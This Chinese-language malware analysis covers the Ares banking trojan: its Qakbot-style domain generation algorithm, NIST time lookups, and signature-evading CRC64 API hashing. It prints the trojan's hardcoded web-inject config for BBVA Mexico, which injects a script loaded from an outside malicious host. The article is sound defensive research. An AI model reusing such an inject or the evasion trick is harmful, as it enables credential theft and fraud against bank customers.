新瓶装旧酒，Ares 银行木马新增 Qakbot DGA 算法

Ares 银行木马在 2021 年 2 月出现，研究人员一直在跟踪该恶意软件的发展。Ares 基于 Osiris 恶意软件家族而来，后者也是由 Kronos 银行木马衍生而来。2022 年 3 月到 2022 年 8 月，Ares 一直都处于静默期。但是 2022 年 8 月 Ares 又重出江湖，并且新增了与 Qakbot 银行木马类似的 DGA 算法。

技术分析

Ares 样本包含一个或多个硬编码 URL，用于 C&C 通信。在新版本的 Ares 中，会尝试请求 C&C 服务器达 50 次。如果无法联通，就启用 DGA 域名。Ares DGA 和 Qakbot DGA 之间的代码对比如下所示：

代码对比

Ares DGA 和 Qakbot DGA 之间的主要区别在于前者每次生成 50 个域名，而旧的 Qakbot 算法每次生成 5000 个域名。Ares 通过 TCP 端口 13 使用 daytime 协议通过以下服务器检索当前日期：

time-a.nist.gov

time-a-g.nist.gov

time.nist.gov

NIST 服务器的响应为 59820 22-08-29 23:18:13 50 0 0 593.0 UTC(NIST) *。

Ares 的 DGA 算法会生成一个长度在 8 到 25 个字符间的域名，并且在 com、net、org、info、biz、org 中选择一个作为顶级域名。Ares 的 DGA 算法每月产生 150 个域名，Ares 在 2022 年 8 月 29 日生成的域名如下所示：

2022 年 8 月 29 日的 DGA 域

目前这些域名都没有解析记录。

对 Ares 代码的分析表明，该算法很可能被重新实现，而不是继续使用 Qakbot 的 DGA 代码。攻击者很可能是基于 Qakbot 的开源实现进行定制化修改的，二者存在诸多相似之处。

研究人员提供了生成 Ares DGA 域名的 Python 脚本，也在 GitHub中存储。

Web 注入配置

攻击者正在测试 Web 注入，将 HTML 内容与 JavaScript 代码插入目标网站。当前 Ares 的 C&C 服务器并不提供动态 Web 注入配置，但样本中包含了硬编码的、以 BBVA Mexico 为目标的配置：

set_url http*bbva*.mx* GPdata_before<body*>data_enddata_inject<div id="botid" style="display:none;">%BOTID%</div><script type="text/javascript" src="https://www.trendybaby.co[.]uk/assets/css/homeats.js"></script>data_end

动态 API 哈希算法

Ares 的开发人员修改了 Kronos 的原始代码，通过 Windows API 哈希值以动态解析 NTDLL 函数。尽管对 CRC64 算法的修改非常小，但已经能够绕过此前检测 Kronos 的静态签名。

动态 API 哈希算法

例如，字符串 sprintf 的标准 CRC64 哈希值为 5FE79276722143D0，而在 Ares 中的 CRC64 哈希值为 DC1FC2878FEE79C0。Ares 然后利用 Kronos 算法将这些值进行映射，研究人员实现了 Python 脚本来进行映射。

总结

Ares 的开发人员持续为恶意软件增加新功能，最近又新增了 Qakbot 的 DGA 算法。这为攻击者提供了更好的韧性，便于获取整个网络的控制权。